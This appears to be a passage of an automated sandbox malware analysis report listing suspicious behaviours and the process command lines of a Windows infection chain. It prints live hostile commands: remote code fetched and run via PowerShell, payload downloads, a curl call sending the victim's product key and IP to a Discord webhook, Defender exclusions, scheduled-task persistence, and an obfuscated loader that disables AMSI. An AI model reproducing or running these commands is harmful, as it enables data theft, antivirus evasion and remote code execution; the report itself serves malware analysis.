| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
| Process | Command line |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM |
| C:\Windows\system32\dwm.exe | "dwm.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation |
| C:\Windows\system32\sihost.exe | sihost.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p |
| C:\Windows\sysmon.exe | C:\Windows\sysmon.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService |
| C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} |
| C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager |
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/_setup/raw | iex
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -WindowStyle Hidden -Command ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol | find ":\"
C:\Windows\system32\mountvol.exe
mountvol
C:\Windows\system32\find.exe
find ":\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath F:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath D:\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid /value
C:\Windows\system32\find.exe
find /i "uuid="
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"
C:\Windows\system32\reg.exe
reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"
C:\Windows\system32\findstr.exe
findstr /ri "REG_SZ"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent icanhazip.com
C:\Windows\system32\curl.exe
curl --silent icanhazip.com
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"
C:\Windows\system32\curl.exe
curl -ks "https://rentry.co/cbkt9fio/raw"
C:\Windows\system32\curl.exe
curl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"
C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
"C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\ProgramData\x4V5.2.exe
"C:\ProgramData\x4V5.2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'
C:\ProgramData\x4Shellcode.exe
"C:\ProgramData\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d
'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+'
'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6}
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe
"C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe
"C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4V5.2.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\x4Malicious'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Malicious'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x4Joex1" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe" /RL HIGHEST
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Malicious" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe" /RL HIGHEST
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4Malicious" /tr "C:\Users\Admin\x4Malicious"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\ProgramData\x4V5.2.exe
"C:\ProgramData\x4V5.2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'
C:\ProgramData\x4Shellcode.exe
"C:\ProgramData\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char]
(44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX 
